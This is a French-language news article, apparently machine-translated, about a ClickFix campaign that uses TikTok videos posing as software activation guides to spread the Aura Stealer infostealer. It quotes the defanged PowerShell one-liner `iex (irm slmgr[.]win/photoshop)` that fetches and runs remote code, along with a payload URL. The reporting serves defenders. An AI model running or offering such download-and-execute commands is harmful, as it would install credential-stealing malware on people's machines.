Les cybercriminels diffusent des logiciels malveillants voleurs d’informations sur TikTok à l’aide de vidéos déguisées en guides d’activation de logiciels gratuits. Selon BipOrdinateurXavier Mertens, gestionnaire d’ISC, a identifié la campagne en cours, qui utilise une méthode d’ingénierie sociale connue sous le nom d’attaque ClickFix pour infecter les systèmes informatiques. Les vidéos, observées par BipOrdinateurprétend fournir des instructions pour activer des logiciels légitimes tels que Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro et Discord Nitro. La campagne fait également la promotion de services fictifs, notamment « Netflix Premium » et « Spotify Premium ». Mertens a noté que cette activité est en grande partie la même qu’une campagne précédemment observée par la société de sécurité Trend Micro en mai. Les vidéos utilisent une technique d’ingénierie sociale qui présente une solution ou un ensemble d’instructions apparemment valide pour inciter les utilisateurs à compromettre leurs propres machines. Cette attaque ClickFix incite les utilisateurs à exécuter des commandes PowerShell malveillantes. Chaque vidéo affiche une commande sur une ligne, telle que `iex (irm slmgr[.]win/photoshop)` et demande aux téléspectateurs de l’exécuter avec les privilèges d’administrateur. Le nom du programme dans l’URL est modifié pour correspondre au logiciel emprunté ; un faux guide Windows utiliserait une URL contenant « windows » au lieu de « photoshop ». Lorsque la commande est exécutée, PowerShell se connecte au site distant `slmgr[.]win` pour récupérer et exécuter un autre script PowerShell. Ce script télécharge deux exécutables à partir des pages Cloudflare. Le premier, de `https://file-epq[.]pages[.]dev/updater.exe`, est une variante du malware Aura Stealer. Cet infostealer est conçu pour récupérer les informations d’identification du navigateur enregistrées, les cookies d’authentification, les données du portefeuille de crypto-monnaie et d’autres informations d’identification d’application. Les données volées sont ensuite téléchargées sur les attaquants, leur donnant accès aux comptes de la victime. Une deuxième charge utile, « source.exe », est également téléchargée dans le cadre de l’attaque. Selon Mertens, cet exécutable auto-compile le code à l’aide du compilateur Visual C# intégré de .NET (`csc.exe`). Le code résultant est ensuite injecté et lancé directement en mémoire. L’objectif précis de cette charge utile supplémentaire reste flou. Les utilisateurs qui ont effectué ces étapes doivent considérer que toutes leurs informations d’identification sont compromises. La marche à suivre recommandée consiste à réinitialiser immédiatement les mots de passe sur tous les sites et services qu’ils utilisent pour empêcher tout accès non autorisé aux comptes et tout autre vol de données. Les attaques ClickFix sont devenues populaires au cours de l’année écoulée et sont utilisées pour distribuer diverses souches de logiciels malveillants dans le cadre de campagnes de ransomware et de vol de cryptomonnaie. En règle générale, les utilisateurs ne doivent jamais copier le texte d’un site Web et l’exécuter dans une boîte de dialogue du système d’exploitation. Cet avis inclut la barre d’adresse de l’Explorateur de fichiers, l’invite de commande, les invites PowerShell, le terminal macOS et les shells Linux.
